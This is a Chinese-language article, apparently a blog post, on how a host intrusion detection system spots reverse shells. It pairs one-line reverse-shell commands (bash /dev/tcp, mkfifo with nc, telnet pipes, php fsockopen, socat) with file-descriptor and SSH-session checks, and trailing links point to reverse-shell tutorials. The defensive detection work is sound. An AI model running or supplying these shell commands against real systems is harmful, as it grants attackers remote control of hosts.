HIDS反弹shell检测方法
检测方法
- 特征:shell(sh bash zsh)进程存在异常的stdin/stdout、异常参数、异常网络连接。
- 行为:检测大概率是在ssh登陆下才会使用的二进制文件(如ls/cat/ip/ipconfig/cd/chmod),1.如果发现这些进程的stdin/stdout和tty不一致则告警;2.如果发现这些进程的dip/dport/sip/sport和SSH_CONNECTION不一致则告警
反弹手段和检测方法
反弹方法 | 检测方法 |
---|---|
bash -i >& /dev/tcp/ $ip/ $port 0>&1
|
bash进程存在异常的stdin/stdout,或者异常的argv,或者bash的进程树存在异常的网络连接bash进程的0,和1文件描述符指向socket
|
telnet $ip $port | /bin/bash | telnet $ip $port
|
同上bash进程的0,和1文件描述符指向pipe
|
rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc $ip $port >/tmp/f
|
同上 |
perl -e ' .. ;exec("/bin/sh -i");};'
|
同上dash或者sh进程的0,和1文件描述符指向socket
|
python -c 'import socket, ... ;p=subprocess.call(["/bin/bash","-i"]);'
|
同上bash的0,和1文件描述符指向socket
|
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
|
同上bash或dash进程的0,和1文件描述符指向socket
|
受害主机通过程序(如python)主动监听 |
同上进程的0,和1文件描述符指向socket
|
telnet c2_ip c2_port 0<SOME_DEVNAME | /bin/bash 1>SOME_DEVNAME
|
通过execve()检测大概率是在ssh登陆下才会使用的二进制文件(如ls/cat/ip/ipconfig/cd/chmod),1.如果发现这些进程的stdin/stdout和tty不一致则告警;2.如果发现这些进程的dip/dport/sip/sport和SSH_CONNECTION不一致则告警execve()调用
|
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:c2_ip:c2_port
|
同上 |
msf反弹、apache后门模块、nginx后门模块
|
同上 |
HIDS反弹shell检测方法相关推荐
- 常见的反弹shell的方法以及对反弹shell的解释
文章目录 一.什么是反弹shell,以及对反弹shell作用原理的解析: 3.反弹shell的本质 linux文件描述符 重定向 输入重定向 输出重定向 标准输出与标准错误输出重定向 文件描述符的复制 ...
- Windows下反弹shell的方法
1.powercat反弹shell powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powers ...
- linux下几种反弹Shell方法的总结与理解
实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹shell命令如下: bash -i >& /dev/tcp/ip/port ...
- mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载. 之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了 ...
- 059 提权与反弹shell
文章目录 一:权限提升概述 二:windows提权 2.1: 启动项提权 2.2:系统漏洞提权 2.2.1:笔记 2.2.2:部分截图 2.2.3:收集到的漏洞列表: 2.2.4:windows200 ...
- Apache Log4j2 RCE漏洞利用反弹shell合集
目录 一.漏洞描述 二.漏洞复现 1. bugku靶场 反弹shell 命令执行 2. 掌控安全 反弹shell 三.Burp扫描插件 四.修复建议 一.漏洞描述 2021年11月24日,阿里云安全团 ...
- 安全技术系列之反弹Shell
原文出处:https://xz.aliyun.com/t/9488 前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹个shell是再常见不过的事情了. 反弹shell, ...
- 【转】反弹Shell,看这一篇就够了
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹个shell是再常见不过的事情了. 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到 ...
- 内网渗透之反弹shell
蚕吐丝,蜂酿蜜,人不学,不如物! 场景1 步骤一:将被控服务器shell反弹到本地的4444端口,并监听4444端口(受害机输入) nc -lvp 4444 -e cmd.exe (反弹windows ...
最新文章
- excel学习笔记之一
- PMBOK项目管理PMI主义\IPMA概述
- sklearn数据集变换
- 【实施工程师】ubuntu创建文件
- 计算机应用能力文字录入,2017全国专业技术人员计算机应用能力考试题库-Excel,Word,XP.pdf...
- 深入hibernate的三种状态
- Java开发笔记(六十九)泛型类的定义及其运用
- 选频滤波器 matlab,MATLAB低通滤波器选频实现
- Android 文本监听接口TextWatcher详解
- python避障小车_基于深度学习的自动避障小车_7_代码说明
- 配置深度森林deep forest(2021)环境填坑
- decent compiled words
- 光纤信号服务器,485转光纤的两种方式
- java计算机毕业设计景区门票系统源码+数据库+系统+lw文档+mybatis+运行部署
- jquery局部打印插件使用
- 达梦数据库在ZYJ环境上通过RPM打包注册服务的步骤
- 华为手机传感器测试软件,华为P8拍摄能力测试 IMX278传感器到底魅力何在
- Android短信备份案例
- Touch ID使用
- 解决使用maven打jar包缺失依赖包问题
热门文章
- 中国移动集团史正军:论支付能力的重要意义及我们要发展什么样的支付?
- 高德地图API获取当前位置对应的周边信息
- transact sql mysql_MySQL与Transact SQL(MS SQL Server)的SQL语句区别点滴(C++)
- 厦门大学 好导师 计算机,厦门大学信息科学与技术学院计算机科学系导师介绍:程明...
- 什么是“蓝牙距离感应装置”
- 蚂蚁金服-微贷事业群 (北京、杭州)招前端
- 三款免费杀毒软件+clamAV
- iOS APP 上架审核过程中常见问题整理
- 不同手机类型该如何更换手机IP
- 卧槽,泪目了!二哥被读者的深情告白了感动哭了!!!!